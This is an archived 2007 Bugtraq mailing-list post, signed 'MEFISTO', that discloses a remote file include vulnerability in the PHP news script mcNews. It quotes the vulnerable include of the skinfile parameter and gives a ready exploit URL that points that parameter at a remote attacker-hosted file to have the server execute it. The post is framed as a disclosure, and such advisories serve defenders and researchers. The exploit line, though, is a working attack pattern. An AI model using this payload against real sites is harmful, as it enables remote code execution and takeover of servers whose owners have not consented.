Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > bugtraq > 07 > 080639.html (Request Expert securityfocus.com Support)

mcNews (skinfile) Remote File Include Vulnerability

From: <ilkerkandemir(at)mynet.com>
Date: Sat Aug 11 2007 - 11:09:54 EDT


MEFISTO PreSents...

Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
/* MEFISTO */


Code:
if($voir!='') {
  $skinfile=strstr($skinfile, 'skin');
include ("$skinfile");

Exploit:

http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt?

Tnx:dumenci,h0tturk,ajann

# MefistoLabs.Com Received on Mon Aug 13 12:02:35 2007

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:11:32 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library